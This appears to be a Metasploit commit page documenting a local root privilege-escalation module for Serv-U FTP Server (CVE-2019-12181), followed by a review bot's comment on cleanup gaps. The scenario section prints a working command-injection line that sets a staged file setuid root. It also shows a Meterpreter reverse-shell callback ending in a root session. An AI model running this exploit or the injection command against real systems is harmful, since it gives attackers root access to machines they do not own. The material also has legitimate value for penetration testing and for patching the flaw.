Land #12030, CVE-2019-12181: Serv-U FTP Server prepareinstallation privesc

asoto-r7
2019-07-01 16:01:04 -05:00
2 changed files with 248 additions and 0 deletions
@@ -0,0 +1,76 @@
## Description
This module attempts to gain root privileges on systems running
Serv-U FTP Server versions prior to 15.1.7.
The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
in a call to `system()`, without validation, when invoked with
the `-prepareinstallation` flag, resulting in command execution
with root privileges.
## Vulnerable Application
[Serv-U FTP Server](https://www.serv-u.com/ftp-server-software)
is an FTP server for Linux and Windows; however, this module
targets only Linux systems.
This module has been tested successfully on:
* Serv-U FTP Server version 15.1.6 (x64) on Debian 9.6 (x64)
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. `use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc`
4. `set SESSION [SESSION]`
5. `check`
6. `run`
7. You should get a new *root* session
## Options
**SERVU_PATH**
Path to `Serv-U` executable (default: `/usr/local/Serv-U/Serv-U`)
**WritableDir**
A writable directory file system path. (default: `/tmp`)
## Scenarios
### Debian 9.6 (x64)
```
msf5 exploit(multi/handler) > back
msf5 > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc
msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] bash shell is available
[+] /usr/local/Serv-U/Serv-U is executable
[+] /usr/local/Serv-U/Serv-U is setuid
[*] Writing '/tmp/.24HnCiwSby' (277 bytes) ...
[*] Executing command: bash -c 'exec -a "\";chown root /tmp/.24HnCiwSby;chmod u+s /tmp/.24HnCiwSby;chmod +x /tmp/.24HnCiwSby\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
[+] /tmp/.24HnCiwSby setuid root successfully
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.250
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.250:58662) at 2019-06-28 23:46:48 -0400
[-] Failed to delete /tmp/.24HnCiwSby: stdapi_fs_delete_file: Operation failed: 1
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```
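Review bot: The sample run at the end of the Scenarios section ends with `[-] Failed to delete /tmp/.24HnCiwSby: stdapi_fs_delete_file: Operation failed: 1`, which means the staged payload that the module just made `chown root` and `chmod u+s` is left behind as a root-owned setuid binary in a world-readable directory, yet nothing in the Description, Options or Scenarios sections warns about this. Add a sentence under **WritableDir** (or a short note after the session output) stating that when automatic cleanup fails the operator must remove the file from the new root session, e.g. `rm -f /tmp/.24HnCiwSby`, and that the staged file should be checked for with `ls -l /tmp/.*` before ending the engagement; a root setuid file left in `/tmp` is a persistence path for any local user. Separately, step 5 of Verification Steps calls for `check`, but the scenario transcript jumps straight from `set verbose true` to `run`, so the documented check output is never shown; either include a `check` invocation in the transcript or drop the step.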